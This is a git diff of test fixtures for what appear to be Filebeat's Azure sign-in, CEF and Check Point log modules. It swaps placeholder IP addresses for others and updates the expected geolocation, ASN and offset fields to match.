+{"Level":"4","callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"175.16.199.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"}
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json
index 49b029ffee32..521b8989015b 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json
@@ -36,7 +36,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "50140",
         "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
-        "client.ip": "1.1.1.1",
+        "client.ip": "89.160.20.156",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -47,7 +47,7 @@
         "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"1.1.1.1\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"1.1.1.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
+        "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"89.160.20.156\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"89.160.20.156\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
         "event.outcome": "failure",
         "event.type": [
             "info"
@@ -63,18 +63,21 @@
         "log.offset": 0,
         "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
         "related.ip": [
-            "1.1.1.1"
+            "89.160.20.156"
         ],
         "service.type": "azure",
-        "source.address": "1.1.1.1",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.1",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "tags": [
             "forwarded"
         ],
@@ -120,7 +123,7 @@
         "azure.signinlogs.result_signature": "None",
         "azure.signinlogs.result_type": "50140",
         "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
-        "client.ip": "8.8.8.8",
+        "client.ip": "175.16.199.1",
         "cloud.provider": "azure",
         "event.action": "Sign-in activity",
         "event.category": [
@@ -131,7 +134,7 @@
         "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"8.8.8.8\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
+        "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"175.16.199.1\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"175.16.199.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
         "event.outcome": "failure",
         "event.type": [
             "info"
@@ -144,21 +147,22 @@
         "geo.location.lon": 2.12341234,
         "input.type": "log",
         "log.level": "4",
-        "log.offset": 1676,
+        "log.offset": 1688,
         "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
         "related.ip": [
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "azure",
-        "source.address": "8.8.8.8",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "8.8.8.8",
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/cef/log/test/cef.log b/x-pack/filebeat/module/cef/log/test/cef.log
index 1e8ab441ff7f..6771918106f0 100644
--- a/x-pack/filebeat/module/cef/log/test/cef.log
+++ b/x-pack/filebeat/module/cef/log/test/cef.log
@@ -1,4 +1,4 @@
-CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=6.7.8.9 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart
-CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=6.7.8.9 spt=33876 dst=1.2.3.4 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb
+CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=1.128.3.4 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart
+CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=1.128.3.4 spt=33876 dst=81.2.69.143 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb
 CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|spriv=user dpriv=root
 CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|message=This event is padded with whitespace dst=192.168.1.2 src=192.168.3.4     
diff --git a/x-pack/filebeat/module/cef/log/test/cef.log-expected.json b/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
index 76698d44be5d..e1a72b5c49a7 100644
--- a/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
+++ b/x-pack/filebeat/module/cef/log/test/cef.log-expected.json
@@ -10,7 +10,7 @@
         "cef.extensions.requestContext": "https://www.google.com",
         "cef.extensions.requestMethod": "POST",
         "cef.extensions.requestUrl": "https://www.example.com/cart",
-        "cef.extensions.sourceAddress": "6.7.8.9",
+        "cef.extensions.sourceAddress": "1.128.3.4",
         "cef.extensions.sourceGeoLatitude": 38.915,
         "cef.extensions.sourceGeoLongitude": -77.511,
         "cef.extensions.sourcePort": 33876,
@@ -25,7 +25,7 @@
         "event.dataset": "cef.log",
         "event.id": 3457,
         "event.module": "cef",
-        "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=6.7.8.9 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart",
+        "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=1.128.3.4 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart",
         "event.severity": 0,
         "fileset.name": "log",
         "http.request.method": "POST",
@@ -33,22 +33,21 @@
         "input.type": "log",
         "log.offset": 0,
         "message": "Web request",
-        "network.community_id": "1:e2rSLr3fJ93cIJDMtVABFxSH5zg=",
+        "network.community_id": "1:sM8+9vcrxFfN3YaSsJNzJisAfBo=",
         "network.transport": "tcp",
         "observer.product": "Vaporware",
         "observer.vendor": "Elastic",
         "observer.version": "1.0.0-alpha",
         "related.ip": [
-            "192.168.10.1",
-            "6.7.8.9"
+            "1.128.3.4",
+            "192.168.10.1"
         ],
         "service.type": "cef",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "6.7.8.9",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.geo.location.lat": 38.915,
+        "source.geo.location.lon": -77.511,
+        "source.ip": "1.128.3.4",
         "source.port": 33876,
         "source.service.name": "httpd",
         "tags": [
@@ -62,28 +61,28 @@
         "cef.device.product": "Vaporware",
         "cef.device.vendor": "Elastic",
         "cef.device.version": "1.0.0-alpha",
-        "cef.extensions.destinationAddress": "1.2.3.4",
+        "cef.extensions.destinationAddress": "81.2.69.143",
         "cef.extensions.destinationPort": 443,
         "cef.extensions.destinationTranslatedAddress": "10.10.10.10",
         "cef.extensions.destinationUserName": "alice",
         "cef.extensions.eventId": 123,
         "cef.extensions.fileHash": "bc8bbe52f041fd17318f08a0f73762ce",
         "cef.extensions.oldFileHash": "a9796280592f86b74b27e370662d41eb",
-        "cef.extensions.sourceAddress": "6.7.8.9",
+        "cef.extensions.sourceAddress": "1.128.3.4",
         "cef.extensions.sourcePort": 33876,
         "cef.extensions.sourceUserName": "bob",
         "cef.name": "Authentication",
         "cef.severity": "low",
         "cef.version": "0",
-        "destination.geo.city_name": "Moscow",
+        "destination.geo.city_name": "London",
         "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7527,
-        "destination.geo.location.lon": 37.6172,
-        "destination.geo.region_iso_code": "RU-MOW",
-        "destination.geo.region_name": "Moscow",
-        "destination.ip": "1.2.3.4",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.nat.ip": "10.10.10.10",
         "destination.port": 443,
         "destination.user.name": "alice",
@@ -91,11 +90,11 @@
         "event.dataset": "cef.log",
         "event.id": 123,
         "event.module": "cef",
-        "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=6.7.8.9 spt=33876 dst=1.2.3.4 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb",
+        "event.original": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=1.128.3.4 spt=33876 dst=81.2.69.143 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb",
         "event.severity": 0,
         "fileset.name": "log",
         "input.type": "log",
-        "log.offset": 269,
+        "log.offset": 271,
         "message": "Authentication",
         "observer.product": "Vaporware",
         "observer.vendor": "Elastic",
@@ -105,21 +104,18 @@
             "bc8bbe52f041fd17318f08a0f73762ce"
         ],
         "related.ip": [
-            "1.2.3.4",
+            "1.128.3.4",
             "10.10.10.10",
-            "6.7.8.9"
+            "81.2.69.143"
         ],
         "related.user": [
             "alice",
             "bob"
         ],
         "service.type": "cef",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "6.7.8.9",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 33876,
         "source.user.name": "bob",
         "tags": [
@@ -145,7 +141,7 @@
         "event.severity": 0,
         "fileset.name": "log",
         "input.type": "log",
-        "log.offset": 531,
+        "log.offset": 539,
         "message": "Authentication",
         "observer.product": "Vaporware",
         "observer.vendor": "Elastic",
@@ -176,7 +172,7 @@
         "event.severity": 0,
         "fileset.name": "log",
         "input.type": "log",
-        "log.offset": 611,
+        "log.offset": 619,
         "message": "This event is padded with whitespace",
         "observer.product": "Vaporware",
         "observer.vendor": "Elastic",
diff --git a/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json b/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
index 237e6f0a8d5b..2a16101ee237 100644
--- a/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
+++ b/x-pack/filebeat/module/cef/log/test/checkpoint.log-expected.json
@@ -43,16 +43,6 @@
         "cef.name": "https",
         "cef.severity": "Unknown",
         "cef.version": "0",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
-        "destination.geo.city_name": "Des Moines",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 41.6006,
-        "destination.geo.location.lon": -93.6112,
-        "destination.geo.region_iso_code": "US-IA",
-        "destination.geo.region_name": "Iowa",
         "destination.ip": "52.173.84.157",
         "destination.nat.ip": "0.0.0.0",
         "destination.nat.port": 0,
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
index c09c614f38c3..45ef5313c20b 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log
@@ -209,7 +209,7 @@
 <134>1 2020-03-29T13:44:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a657,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59229"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:44:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a659,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:44:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49784"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49784"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42424"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10044"; xlatesrc:"0.0.0.0"]
